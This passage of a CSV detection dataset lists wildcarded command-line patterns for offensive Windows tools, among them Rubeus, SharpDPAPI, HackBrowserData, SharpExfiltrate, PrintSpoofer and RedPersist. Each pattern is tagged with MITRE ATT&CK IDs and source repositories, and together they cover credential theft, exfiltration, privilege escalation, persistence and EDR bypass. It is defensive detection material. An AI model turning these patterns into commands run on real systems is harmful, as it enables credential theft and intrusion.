/uncpath:*\\*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z"
+"*.exe app /deploy /name:* /groupname:* /assignmentname:*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z"
+"*.exe asktgt /user:* /aes256:* /opsec /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus More stealthy variant but requires the AES256 key (see 'Dumping OS credentials with Mimikatz' section)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe asktgt /user:* /rc4:* /createnetonly:*cmd.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Pass the ticket to a sacrificial hidden process. allowing you to e.g. 
steal the token from this process (requires elevation)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe asktgt /user:* /rc4:* /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Request a TGT as the target user and pass it into the current session","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe AzureStorage --connectionstring * --filepath * --extensions *","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z"
+"*.exe -b all -f json --dir results -cc*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z"
+"*.exe backupkey /nowrap *.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI 
functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*.exe certificates /mkfile:*.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*.exe client *:* R:socks*","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe compute --sid * --kdskey *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z"
+"*.exe computername=* command=* username=* password=* nla=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z"
+"*.exe computername=* command=* username=* password=* takeover=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - 
T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z"
+"*.exe computername=* command=* username=* password=* connectdrive=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z"
+"*.exe computername=* command=* username=* password=* elevated=taskmgr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z"
+"*.exe computername=* command=* username=* password=* elevated=winr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z"
+"*.exe computername=* command=* username=* password=* exec=cmd*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z"
+"*.exe create /payload* /kb*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - 
T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z"
+"*.exe credentials /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*.exe -d * -u * -p * -m LDAPS*","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","72","16","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z"
+"*.exe -d 1 -c cmd.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z"
+"*.exe -d 3 -c *powershell -ep bypass*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z"
+"*.exe dump /luid:0x5379f2 /nowrap*","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe --eventviewer *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*.exe exec * cmd interactive*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z"
+"*.exe Get-DomainController -Domain * -Server * -Credential *","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z"
+"*.exe -gettgs -luid:*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z"
+"*.exe gmsainfo --sid *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z"
+"*.exe GoogleDrive --appname * --accesstoken * --filepath * --extensions * --memoryonly*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework 
to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*.exe -group=all *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe -group=all -full*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe -group=remote *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe -group=system *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe -group=user *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe hash /password:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*.exe -i -c powershell.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z"
+"*.exe kdsinfo --guid *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z"
+"*.exe krbscm -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
+"*.exe -l * -c {B91D5831-B1BD-4608-8198-D72E155020F7}*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
+"*.exe -l * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - 
T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
+"*.exe machinetriage*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*.exe monitor /interval:5 /nowrap","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe NonstandardProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe NTLMSettings*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe OneDrive --username * --password * --filepath *\*.exe*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*.exe --override-file --source-file *.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*.exe ptt /ticket:*","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe -ptt ticket:*.kirbi*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z"
+"*.exe --pwsh *.ps1 *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*.exe -q InterestingProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe -q PowerShell*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe -q WindowsDefender*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*.exe rbcd -m * -p * -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
+"*.exe --remove-reparse --source-file *.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*.exe -s * -c service_mod *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & 
Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"*.exe -s *\x*\x*\x*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z"
+"*.exe s4u /ticket:* /impersonateuser:* /msdsspn:* /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe s4u /user:* /impersonateuser:* /msdsspn:* /altservice:ldap /ptt /rc4*","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus access the LDAP service on the DC (for dcsync)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe --schedule * *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*.exe --screensaver *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - 
TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*.exe Search Find-Persist*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
+"*.exe --set-reparse override --source-file *.exe --target-file *","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*.exe shadowcred -c * -f*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z"
+"*.exe -sniffer n*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z"
+"*.exe --startup *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*.exe -t startupfolder -c * -a * -f*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit 
written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
+"*.exe -t tortoisesvn -c * -a * -m*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
+"*.exe -t wl-extract.dll -d *.dat -r *.rsa -*.exe*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z"
+"*.exe triage","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*.exe triage /password:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*.exe -uac","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
